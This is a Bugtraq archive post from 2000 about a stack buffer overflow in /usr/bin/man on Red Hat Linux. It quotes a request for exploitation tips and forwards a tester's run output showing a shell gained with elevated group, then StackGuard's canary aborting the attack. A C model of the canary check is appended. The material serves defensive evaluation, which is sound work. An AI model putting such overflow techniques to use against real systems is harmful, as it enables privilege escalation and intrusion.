Bugtraq mailing list archives
Re: No-Exec Stack Smashing 101
From: crispin () WIREX COM (Crispin Cowan)
Date: Thu, 20 Apr 2000 05:00:42 +0000
"Granquist, Lamont" wrote:
Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it). And I'm looking for a little help here. What I've been playing with so far is things like the following trying to sort out the parameters of the buffer overflow.

...

So, anyone got any tips for where to point the RA and what the stack should look like?
At WireX we've been doing some fresh vulnerability testing. In the attached e-mail, M.C.Mar <woloszyn () ipartners pl> describes his work for us demonstrating an exploit against the man vulnerability, and then demonstrating that the StackGuarded version of man is not vulnerable.

We are intent on undertaking a continuous evaluation process of testing every working stack smashing exploit we can find for StackGuard compatible platforms (x86/Linux, esp. Red Hat). We would appreciate any help we can get in getting live exploits to actually work. We succeeded with man, but failed with ircii.

Crispin
-----
Crispin Cowan, CTO, WireX Communications, Inc. http://wirex.com
Free Hardened Linux Distribution: http://immunix.org
JOBS! http://immunix.org/jobs.html
Date: Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
From: "M.C.Mar" <woloszyn () ipartners pl>
To: Crispin Cowan <crispin () wirex com>
Subject: Re: First Penetration Test

OK. I have only two hours today so I started with man. I compiled vulnerable man sources (man-1.5g-6.src.rpm) with regular egcs-1.1.2-12.i386 I have installed on my RH 6.0.
I tuned the exploit to produce a shell on my system:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470 len: 4073

sh:F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh ?ó
bash$ id
uid=1000(emsi) gid=1000(emsi) egid=15(man) groups=1000(emsi)
bash$

I attached the exploit.

Then I recompiled the vulnerable code with gcc-2.7.2.3-14_SGc2_SG121.i386.rpm and tested StackGuarded code with my exploit:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470 len: 4073

sh:F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh ?ó
man[6129]: Immunix type 2 Canary[7] = 850e2904 died with cadaver ae4bfc74 in procedure display_cat_file.

As I mentioned at the beginning I have only two hours so I didn't examine the vulnerable code whether it is possible to exploit the vulnerability bypassing StackGuard protection.

--
Mariusz Wołoszyn
Internet Security Specialist, IT -- Internet Partners
E-mail: Mariusz.Woloszyn () it pl, woloszyn () it pl

[Attachment: 4man.c (base64-encoded exploit source, omitted)]
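The canary check that stopped the StackGuarded man in the forwarded test, modelled as an added example (my own code, not WireX's StackGuard and not from this thread). The frame layout, the fixed canary value and the caller address are assumptions for illustration; a real build randomizes the canary per process.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of a StackGuard-protected frame laid out as on x86:
 * locals, then the canary word, then the saved return address. An overrun
 * of buf must clobber the canary before it can reach the return address. */
#define BUFSZ 64
struct guarded_frame {
    char     buf[BUFSZ];   /* local array an unbounded copy can overrun */
    uint32_t canary;       /* word planted by the function prologue */
    uint32_t saved_ret;    /* what a stack smash is trying to overwrite */
};

/* Constructed fixed canary; a real StackGuard build randomizes it. */
static const uint32_t g_canary = 0x850e2904u;
/* Unbounded copy standing in for strcpy()/sprintf() into a small buffer.
 * Clamped to the frame size so the model stays deterministic. */
static void unsafe_copy(struct guarded_frame *f, const char *src)
{
    size_t n = strlen(src);
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, src, n);   /* buf sits at offset 0 */
}

/* Prologue, body, and the canary value the epilogue will see. */
static uint32_t run_frame(const char *input)
{
    struct guarded_frame f;
    f.canary = g_canary;          /* prologue plants the canary */
    f.saved_ret = 0x08048abcu;    /* constructed caller address */
    unsafe_copy(&f, input);       /* body copies attacker-sized input */
    return f.canary;              /* epilogue reads it back before ret */
}

/* 1 if the function may return normally, 0 if StackGuard would abort. */
int run_guarded(const char *input) { return run_frame(input) == g_canary; }

/* The value that replaced the canary (its "cadaver"), or the canary itself. */
uint32_t cadaver_for(const char *input) { return run_frame(input); }

int main(void)
{
    char attack[80];                        /* constructed 79 x 'A' input */
    memset(attack, 'A', 79); attack[79] = '\0';
    if (!run_guarded(attack))
        printf("Canary = %08x died with cadaver %08x\n", (unsigned)g_canary,
               (unsigned)cadaver_for(attack));
    return 0;
}
```

An input that exactly fills buf leaves the canary intact; anything longer overwrites the canary before it can touch saved_ret, which is why the check in the epilogue catches the smash before the corrupted return address is ever used.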